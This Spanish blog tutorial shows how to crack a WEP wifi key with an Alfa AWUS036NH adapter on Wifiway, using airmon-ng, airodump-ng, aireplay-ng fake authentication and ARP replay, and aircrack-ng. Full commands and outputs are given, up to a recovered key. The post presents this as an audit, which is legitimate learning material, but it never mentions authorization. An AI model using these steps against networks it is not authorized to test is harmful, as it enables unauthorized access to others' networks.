Seguridad y Redes

El alfa 2W (AWUS036NH) es soportado en la nueva versión de Wifiway 2.0.1, al conectarla automáticamente la reconoce, y soporta modo monitor. En este post se muestra paso a paso el proceso de como realizar una auditoria wifi con el Alfa AWUS036NH 2000MW.

Estos pasos los realice desde VMware, donde tengo instalado Wifiway 2.0.1. Para ver como es el proceso de instalación de Wifiway 2.0.1 en VMware, lo pueden ver en este post.
Lo primero que aremos es poner un iwconfig en consola, para ver si Wifiway reconoce nuestra alfa 2W, tal como se muestra a continuación.

wifiway ~ # iwconfig
lo        no wireless extensions.

eth0      no wireless extensions.

wlan0     IEEE 802.11bgn  ESSID:off/any
         Mode:Managed  Access Point: Not-Associated   Tx-Power=7 dBm
         Retry  long limit:7   RTS thr:off   Fragment thr:off
         Encryption key:off
         Power Management:on

Como podemos, Wifiway lo reconoce automáticamente. Así que nuestro segundo paso es ponerlo en modo Monitor. El modo monitor es un modo especial que se usa para capturar paquetes wireles 802.11. Para esto iniciamos el script airmon-ng tal como se muestra a continuación.

wifiway ~ # airmon-ng start wlan0

Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID     Name
3375    dhcpcd
Process with PID 3304 (dhcpcd) is running on interface wlan0

Interface       Chipset         Driver

wlan0           Ralink RT2870/3070      rt2800usb - [phy0]
                       (monitor mode enabled on mon0)
wifiway ~ #

Una vez que hemos puesto el alfa en modo monitor, podremos lanzar airodump-ng para escanear las redes que están a nuestro alcance para poder elegir un objetivo y centrarnos en una red en concreto.

wifiway ~ # airodump-ng mon0

CH 12 ][ Elapsed: 4 s ][ 2011-02-27 03:32

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

5C:4C:A9:XX:XX:XX  -80        0        0    0  11  54e  WEP  WEP         AGUXX
00:18:3F:XX:XX:XX  -24        4       55   27   6  54 . WEP  WEP         2WIREXXX

BSSID              STATION            PWR   Rate    Lost  Packets  Probes

Una vez elegido el objetivo, lanzamos el siguiente comando para decirle a airodump-ng que escuche con nuestro dispositivo USB (mon0) en el canal (6) donde esta trasmitiendo el punto de acceso (00:18:3F:XX:XX:XX).

wifiway ~ # airodump-ng --bssid 00:18:3F:XX:XX:XX -c 6 -w captura mon0

Con el parámetro --bssid indicamos la dirección MAC del punto de acceso, -c indicamos el numero de canal y el parámetro -w ponemos el nombre del archivo donde se guardaran los datos. Hecho lo anterior podremos ver las redes que están en nuestro alcance, tal como se muestra a continuación.

CH  6 ][ Elapsed: 1 min ][ 2011-02-27 03:35

BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

00:18:3F:XX:XX:XX  -24  94      741     2922  368   6  54 . WEP  WEP    OPN  2WIRE6743

BSSID              STATION            PWR   Rate    Lost  Packets  Probes

00:18:3F:XX:XX:XX  00:C0:CA:XX:XX:XX    0    0 - 1     58     6394
00:18:3F:XX:XX:XX  0C:60:76:XX:XX:XX  -14   54 -54      0       5

Ahora lo que haremos es realizar una falsa autenticación con el Punto de Acceso Wifi para que acepte cualquier paquete que le enviemos. Para esto, en consola realizamos lo siguiente.

wifiway ~ # aireplay-ng -e 2WIREXXX -a 00:18:3F:XX:XX:XX -h 00:c0:XX:XX:XX:XX -1 0 mon0
03:34:44  Waiting for beacon frame (BSSID: 00:18:3F:XX:XX:XX) on channel 6

03:34:44  Sending Authentication Request (Open System) [ACK]
03:34:44  Authentication successful
03:34:44  Sending Association Request [ACK]
03:34:44  Association successful :-) (AID: 1)

Tal como podemos ver, nos hemos asociado correctamente. Ahora, como nuestra alfa AWUS036NH 2000MW si que soporta la inyección de paquetes, lanzamos el ataque 3 (ARP-request reinjection) de aireplay-ng para aumentar la velocidad de captura de los IVs (vectores de inicialización).

Lo que sucede en este paso es, que areplay-ng escucha hasta encontrar un paquete ARP y cuando encuentra este paquete lo que hace es retransmitirlo hacia el punto de acceso, esto provoca que el AP tenga que repetir el paquete ARP con un IV nuevo y al retransmitir y retransmitir los paquetes ARP tendremos mas IVs que nos permitirán averiguar la clave WEP.

wifiway ~ # aireplay-ng -e 2WIREXXX -b 00:18:3F:XX:XX:XX -h 00:c0:ca:XX:XX:XX -3 mon0
03:34:54  Waiting for beacon frame (BSSID: 00:18:XX:XX:XX:XX) on channel 6
Saving ARP requests in replay_arp-0227-033454.cap
You should also start airodump-ng to capture replies.
Read 6930 packets (got 1968 ARP requests and 1963 ACKs), sent 1989 packets...(499 pps)

Ahora solo toca esperar a que tengamos suficientes paquetes de datos (#Data) para ejecutar aircrack-ng para crackear la Clave WEP.

Una vez que ya tengamos suficientes "datas" ejecutamos aircrack-ng para crackear la clave WEP. Abrimos consola y ejecutar aircrack-ng con el nombre del archivo guardado, en este caso es captura-01.cap

wifiway ~ # aircrack-ng captura-01.cap
Opening captura-01.cap
Read 114810 packets.

#  BSSID              ESSID                     Encryption

1  00:18:3F:XX:XX:XX  2WIREXXX                 WEP (25944 IVs)

Choosing first network as target.

Opening captura-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 26149 ivs.

                            Aircrack-ng 1.1 r1734


            [00:00:00] Tested 8 keys (got 25979 IVs)

KB    depth   byte(vote)
0    2/  4   5E(32768) 76(31488) D1(31488) 1C(31232) ED(31232) 58(30976)
1    0/  1   02(35072) 7A(33024) E0(32768) 5B(32512) 8E(32256) 92(31488)
2    0/  1   95(36864) BC(33280) 0E(32256) DB(32000) 54(31488) 5F(31488)
3    0/  1   92(38656) 1E(34816) 8C(33280) C5(32512) 44(32256) DE(32256)
4    0/  2   80(35328) 3E(34048) 84(32512) 54(32256) EB(32256) 8F(30976)

                KEY FOUND! [ 76:02:95:92:80 ]
Decrypted correctly: 100%

Happy hacking wireless con el alfa AWUS036NH 2000MW...